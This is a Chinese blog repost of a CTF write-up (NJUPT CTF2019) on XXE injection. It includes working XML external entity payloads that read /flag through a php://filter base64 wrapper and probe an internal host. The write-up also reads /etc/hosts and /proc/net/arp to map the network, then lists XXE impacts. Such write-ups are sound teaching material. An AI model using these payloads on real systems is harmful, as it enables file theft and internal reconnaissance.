关于XXE「建议收藏」

关于XXE「建议收藏」NJUPTCTF2019:做题的时候,抓包看了一下,响应XML格式消息,并没有严格过滤,这道题读文件,<!DOCTYPEfoo[<!ENTITYxxeSYSTEM”php://filter/read=convert.base64-encode/resource=/flag”>]><ticket><username>&amp…

大家好,又见面了,我是你们的朋友全栈君。

NJUPT CTF2019:
在这里插入图片描述
做题的时候,抓包看了一下,响应XML格式消息,并没有严格过滤,这道题读文件,

<!DOCTYPE foo [
<!ENTITY  xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag" >]>
<ticket>
<username>&xxe;</username>
<code>aaaa</code>
</ticket>

在这里插入图片描述
通过读取/etc/hosts以及/proc/net/arp,推测主机ip:192.168.1.8

<!DOCTYPE foo [
<!ENTITY  xxe SYSTEM "http://192.168.1.8/" >]>
<ticket>
<username>&xxe;</username>
<code>aaaa</code>
</ticket>

漏洞解释:
xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。
常见的利用,就和上面的题一样,读文件,嗅探,Dos,Blind XXE

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/142474.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号